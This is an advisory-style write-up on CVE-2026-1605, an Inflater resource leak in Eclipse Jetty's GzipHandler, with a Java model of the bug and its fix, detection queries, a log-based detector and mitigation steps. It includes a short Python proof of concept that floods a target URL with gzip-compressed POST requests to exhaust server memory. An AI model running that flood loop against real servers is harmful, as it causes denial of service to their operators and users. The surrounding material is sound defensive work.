CVE-2026-1605 – Eclipse Jetty Inflater Resource Leak
Vulnerability Summary
| Field | Details |
|---|---|
| CVE ID | CVE-2026-1605 |
| Product | Eclipse Jetty |
| Component | GzipHandler |
| Vulnerability Type | Resource Leak / Memory Exhaustion |
| CWE | CWE-400 (Uncontrolled Resource Consumption), CWE-401 (Missing Release of Memory After Effective Lifetime) |
| CVSS Score | 7.5 |
| Severity | High |
| CVSS Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Impact | Denial of Service (Availability) |
| Exploitability | Remote |
| Exploit Availability | No publicly confirmed exploit at disclosure time |
| Affected Versions | Jetty 12.0.0 – 12.0.31, Jetty 12.1.0 – 12.1.5 |
| Published | March 2026 |
| Official Patch | https://github.com/jetty/jetty.project/security/advisories/GHSA-xxh7-fcf3-rj7f |
The vulnerability exists in the Jetty GzipHandler component responsible for processing compressed HTTP traffic. A flaw in how decompression resources are handled results in a memory resource leak. When specially crafted HTTP requests are repeatedly processed, system memory consumption gradually increases until the application becomes unstable or stops responding.
Vulnerability Overview
In affected Jetty versions, the request handling pipeline allocates a JDK Inflater object whenever a request arrives with gzip compression enabled.
The Inflater object is normally expected to be released after the request lifecycle is completed. However, the cleanup routine is tied to the logic used when a compressed response is generated. If a compressed request is received but the server returns a non-compressed response, the cleanup logic is never executed.
As a result, the Inflater instance remains allocated in memory.
When this condition occurs repeatedly, multiple Inflater instances accumulate in memory, which eventually causes excessive memory consumption. Over time the Java process may experience heavy garbage collection, degraded performance, or a complete service crash due to memory exhaustion.
Technical Details
The issue originates from the interaction between the GzipHandler request decompression workflow and the response compression lifecycle.
Typical request handling in Jetty:
- Client sends HTTP request with gzip encoding.
- Jetty allocates a JDK Inflater to decompress the request body.
- Request is forwarded to the application layer.
- Application generates a response.
- Resource cleanup is triggered when gzip response handling completes.
The flaw occurs when:
- Request is compressed
- Response is not compressed
In this scenario, the response compression logic is skipped, which also prevents the Inflater cleanup routine from running.
Because the object is never released, memory consumption gradually increases.
This behaviour may not immediately crash the system but leads to progressive resource exhaustion, which can ultimately disrupt service availability.
Root Cause
The root cause is the improper lifecycle management of the Inflater object.
The resource release is incorrectly bound to the response compression mechanism, rather than the request decompression lifecycle.
When the response bypasses compression, the Inflater remains allocated.
This results in:
- Memory allocation without release
- Increased heap pressure
- Resource exhaustion over time
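The lifecycle defect described in the Technical Details and Root Cause sections, reduced to a runnable model. This is an added example written for this write-up, not Jetty's GzipHandler code: the Exchange class, the liveInflaters counter and both handler variants are assumptions that reproduce only the shape of the problem (release reachable only from the response-compression path, versus release bound to the request lifecycle with try/finally). It uses zlib framing via java.util.zip.Deflater/Inflater instead of gzip so that Inflater can be driven directly.

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.zip.DataFormatException;
import java.util.zip.Deflater;
import java.util.zip.Inflater;

// Hypothetical model of the lifecycle defect, written for this write-up. It is not Jetty's
// GzipHandler: Exchange, the liveInflaters counter and both handlers are assumptions. zlib
// framing is used so java.util.zip.Inflater can be used directly; the point is where end() runs.
public final class InflaterLifecycleDemo {
    /** One exchange: compressed request body plus whether the client accepts a gzip response. */
    static final class Exchange {
        final byte[] compressedBody;
        final boolean clientAcceptsGzip;
        Inflater inflater;   // allocated when the request body is decompressed
        Exchange(byte[] b, boolean g) { compressedBody = b; clientAcceptsGzip = g; }
    }

    /** Inflaters created but not yet end()'ed; stands in for the native state a leaked Inflater holds. */
    static int liveInflaters = 0;

    /** Request side: allocate an Inflater and decompress the body. */
    private static byte[] decompressRequest(Exchange ex) throws DataFormatException {
        ex.inflater = new Inflater();
        liveInflaters++;
        ex.inflater.setInput(ex.compressedBody);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[256];
        while (!ex.inflater.finished()) {
            int n = ex.inflater.inflate(buf);
            if (n == 0 && (ex.inflater.needsInput() || ex.inflater.needsDictionary())) break; // truncated input
            out.write(buf, 0, n);
        }
        return out.toByteArray();
    }

    /** Release the Inflater exactly once. */
    private static void releaseInflater(Exchange ex) {
        if (ex.inflater != null) {
            ex.inflater.end();
            ex.inflater = null;
            liveInflaters--;
        }
    }

    /** Stand-in application layer: echo the decoded body with a prefix. */
    private static byte[] application(byte[] body) {
        return ("ok:" + new String(body, StandardCharsets.UTF_8)).getBytes(StandardCharsets.UTF_8);
    }

    /** Vulnerable shape: cleanup is reachable only through the response-compression path. */
    static byte[] handleVulnerable(Exchange ex) throws DataFormatException {
        byte[] body = decompressRequest(ex);
        byte[] response = application(body);
        if (ex.clientAcceptsGzip) {
            releaseInflater(ex);   // runs only when a compressed response is produced
            return compress(response);
        }
        return response;           // uncompressed response: the Inflater is never released
    }

    /** Fixed shape: release is tied to the request lifecycle and runs on every exit path. */
    static byte[] handleFixed(Exchange ex) throws DataFormatException {
        try {
            byte[] body = decompressRequest(ex);
            byte[] response = application(body);
            return ex.clientAcceptsGzip ? compress(response) : response;
        } finally {
            releaseInflater(ex);
        }
    }

    static byte[] compress(byte[] data) {
        Deflater deflater = new Deflater();
        try {
            deflater.setInput(data);
            deflater.finish();
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            byte[] buf = new byte[256];
            while (!deflater.finished()) out.write(buf, 0, deflater.deflate(buf));
            return out.toByteArray();
        } finally {
            deflater.end();
        }
    }

    public static void main(String[] args) throws DataFormatException {
        byte[] body = compress("{\"test\":\"resource_leak\"}".getBytes(StandardCharsets.UTF_8));
        int before = liveInflaters;
        for (int i = 0; i < 1000; i++) handleVulnerable(new Exchange(body, false));
        System.out.println("vulnerable handler leaked " + (liveInflaters - before) + " Inflaters");
        before = liveInflaters;
        for (int i = 0; i < 1000; i++) handleFixed(new Exchange(body, false));
        System.out.println("fixed handler leaked " + (liveInflaters - before) + " Inflaters");
    }
}
```

Compile with javac and run: the vulnerable handler reports 1000 unreleased Inflaters after 1000 compressed requests whose responses were not compressed, the fixed handler reports 0. The structural fix is that release lives in a finally block owned by the request, so no sibling code path (response compression being skipped, or an exception in the application layer) can bypass it.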
Affected Environment
The vulnerability may affect environments where:
- Jetty is used as a standalone HTTP server
- Jetty runs as an embedded server inside applications
- Applications accept gzip encoded HTTP requests
- GzipHandler is enabled
Common affected deployments include:
- Java microservices
- Spring Boot applications configured with Jetty
- API gateways using Jetty
- Internal web platforms running Jetty containers
Internet-facing Jetty deployments are particularly exposed because attackers can trigger the vulnerable behaviour remotely.
Exploitation Scenario
The vulnerability may be exploited through repeated HTTP requests containing gzip compressed payloads.
An attacker could automate a script that continuously sends compressed requests while ensuring that the application returns an uncompressed response.
Each request causes an Inflater object to remain allocated in memory.
Because these objects accumulate, the application memory footprint continues to increase until the server becomes unstable.
Potential impacts include:
- High JVM heap utilization
- Increased garbage collection frequency
- Slow response times
- JVM OutOfMemoryError
- Application crash
- Service outage
This attack requires no authentication or special privileges.
Proof of Concept (Educational)
The following example demonstrates how repeated compressed requests could trigger the issue.
Example HTTP Request
POST /api/data HTTP/1.1
Host: target-server
Content-Encoding: gzip
Content-Type: application/json
Connection: keep-alive
Content-Length: 150

<gzip compressed request body>
Example Python PoC
import gzip
import requests

url = "http://target-server/api/data"
# gzip-compressed JSON body; the server must accept a compressed request body
payload = gzip.compress(b'{"test":"resource_leak"}')
headers = {
    "Content-Encoding": "gzip",
    "Content-Type": "application/json",
}

for i in range(100000):
    try:
        requests.post(url, data=payload, headers=headers)
    except requests.RequestException:
        # connection errors are ignored so the loop keeps running
        pass
When executed repeatedly against a vulnerable system, memory consumption gradually increases until service degradation occurs.
This code is provided only for educational security testing in controlled environments.
MITRE ATT&CK Mapping
| Tactic | Technique | ID |
|---|---|---|
| Impact | Endpoint Denial of Service | T1499 |
| Impact | Resource Exhaustion | T1499.002 |
| Impact | Application Layer DoS | T1499.004 |
The vulnerability aligns with availability-focused attacks, where service disruption is achieved by exhausting server resources.
Indicators of Compromise
During exploitation attempts, the following indicators may be observed:
Application Indicators
- Sudden increase in JVM heap memory usage
- Increased frequency of garbage collection cycles
- Application latency spikes
- Service crashes or restarts
Log Indicators
Repeated requests containing:
Content-Encoding: gzip
Possible JVM error messages:
java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: GC overhead limit exceeded
Detection
Monitoring for abnormal gzip traffic patterns can help identify exploitation attempts.
Log Sources
Recommended telemetry sources include:
- Web server access logs
- Reverse proxy logs
- Application logs
- JVM garbage collection logs
- Container runtime logs
- WAF or API gateway logs
Detection Queries
Splunk
index=web_logs
| search request_headers="*Content-Encoding: gzip*"
| stats count by src_ip
| where count > 300
Elastic / Kibana
http.request.headers.content-encoding:"gzip"
Aggregation example:
GET /logs-*/_search
{
"query": {
"match": {
"http.request.headers.content-encoding": "gzip"
}
},
"aggs": {
"requests_per_ip": {
"terms": {
"field": "source.ip",
"size": 20
}
}
}
}
Microsoft Sentinel (KQL)
CommonSecurityLog
| where RequestHeaders contains "Content-Encoding: gzip"
| summarize count() by SourceIP, bin(TimeGenerated, 5m)
| where count_ > 200
Generic SIEM Detection Logic
IF
HTTP header contains "Content-Encoding: gzip"
AND
request volume from same source exceeds threshold
THEN
flag potential resource exhaustion attempt
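The generic logic above applied to log lines in code, as an added example for this write-up (not Jetty's or any SIEM product's code). It assumes a constructed access-log format in which the proxy records both the request and the response Content-Encoding, so the detector can count only requests that match the leak condition from the Technical Details section (gzip request body, uncompressed response) instead of all gzip traffic; the field layout, IP addresses and threshold are made up for the example.

```java
import java.time.Instant;
import java.time.format.DateTimeParseException;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;

// Detection example written for this write-up; not Jetty's or any SIEM vendor's code.
// Assumed (constructed) access-log format, with "-" when a header is absent:
//   <ISO-8601 time> <client ip> <method> <path> <status> req_enc=<value> resp_enc=<value>
// Only lines matching the leak condition (gzip request, uncompressed response) are counted,
// per source IP, in 5-minute windows, mirroring the bin()/threshold logic of the queries above.
public final class GzipFloodDetector {
    static final long WINDOW_SECONDS = 300;

    /** A source IP that exceeded the threshold inside one window. */
    static final class Alert {
        final String sourceIp;
        final long windowStart;   // epoch seconds, aligned to WINDOW_SECONDS
        final int count;
        Alert(String ip, long w, int c) { sourceIp = ip; windowStart = w; count = c; }
        @Override public String toString() {
            return sourceIp + " sent " + count + " gzip requests answered uncompressed in window starting "
                    + Instant.ofEpochSecond(windowStart);
        }
    }

    /** True when the parsed line is a gzip request body answered without a compressed response. */
    static boolean isLeakCandidate(String[] f) {
        String reqEnc = f[5].substring("req_enc=".length());
        String respEnc = f[6].substring("resp_enc=".length());
        return reqEnc.equalsIgnoreCase("gzip") && respEnc.equals("-");
    }

    static List<Alert> detect(List<String> lines, int threshold) {
        // sourceIp -> (windowStart -> count); LinkedHashMap keeps first-seen order for stable output
        Map<String, Map<Long, Integer>> counts = new LinkedHashMap<>();
        for (String line : lines) {
            String[] f = line.trim().split("\\s+");
            if (f.length < 7 || !f[5].startsWith("req_enc=") || !f[6].startsWith("resp_enc=")) {
                continue;   // malformed line: skip it rather than crash the detector
            }
            if (!isLeakCandidate(f)) continue;
            long epoch;
            try {
                epoch = Instant.parse(f[0]).getEpochSecond();
            } catch (DateTimeParseException e) {
                continue;   // unparseable timestamp: skip
            }
            long window = epoch - (epoch % WINDOW_SECONDS);
            counts.computeIfAbsent(f[1], k -> new LinkedHashMap<>()).merge(window, 1, Integer::sum);
        }
        List<Alert> alerts = new ArrayList<>();
        for (Map.Entry<String, Map<Long, Integer>> byIp : counts.entrySet()) {
            for (Map.Entry<Long, Integer> byWindow : byIp.getValue().entrySet()) {
                if (byWindow.getValue() > threshold) {
                    alerts.add(new Alert(byIp.getKey(), byWindow.getKey(), byWindow.getValue()));
                }
            }
        }
        return alerts;
    }

    /** i-th request inside the 10:00-10:04 window: minute = i / 60, second = i % 60. */
    private static String logLine(int i, String ip, String reqEnc, String respEnc) {
        return String.format("2026-03-10T10:%02d:%02dZ %s POST /api/data 200 req_enc=%s resp_enc=%s",
                i / 60, i % 60, ip, reqEnc, respEnc);
    }

    /** Constructed sample: a flood source, a normal client, a client whose responses are compressed. */
    static List<String> sampleLog() {
        List<String> lines = new ArrayList<>();
        for (int i = 0; i < 250; i++) lines.add(logLine(i, "203.0.113.7", "gzip", "-"));   // leak pattern, 250 in one window
        for (int i = 0; i < 3; i++) lines.add(logLine(i, "198.51.100.20", "gzip", "-"));  // ordinary volume
        for (int i = 0; i < 250; i++) lines.add(logLine(i, "192.0.2.9", "gzip", "gzip")); // cleanup path runs
        lines.add("garbage line without the expected fields");                             // malformed
        return lines;
    }

    public static void main(String[] args) {
        for (Alert a : detect(sampleLog(), 200)) System.out.println("ALERT: " + a);
    }
}
```

Run against the constructed sample with a threshold of 200, it raises exactly one alert, for 203.0.113.7 with 250 matching requests in the 10:00 window; the client whose responses were compressed generates the same request volume but is not flagged, because on that path the advisory's cleanup logic does run. Where the proxy does not log the response encoding, drop the resp_enc check and fall back to counting all gzip-encoded requests, as the Splunk and KQL queries do.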
Mitigation
Short-term mitigation steps may include:
- Rate limiting gzip encoded requests
- Blocking unnecessary gzip request bodies
- Filtering excessive compressed traffic through WAF
- Monitoring JVM memory consumption
Operational controls such as memory limits or container restarts may reduce impact but will not eliminate the underlying flaw.
The only reliable remediation is applying the vendor patch.
Remediation
Upgrade Jetty to a patched release where the Inflater resource lifecycle is properly handled.
Vendor security advisory and patch:
https://github.com/jetty/jetty.project/security/advisories/GHSA-xxh7-fcf3-rj7f
Security Impact
Although the vulnerability does not allow direct code execution or data exposure, it enables attackers to remotely trigger memory exhaustion conditions.
Because the attack requires minimal effort and no authentication, exposed Jetty servers may be forced into service disruption if not updated.
Organizations running affected Jetty versions should prioritize patching to avoid potential Denial-of-Service conditions in production environments.
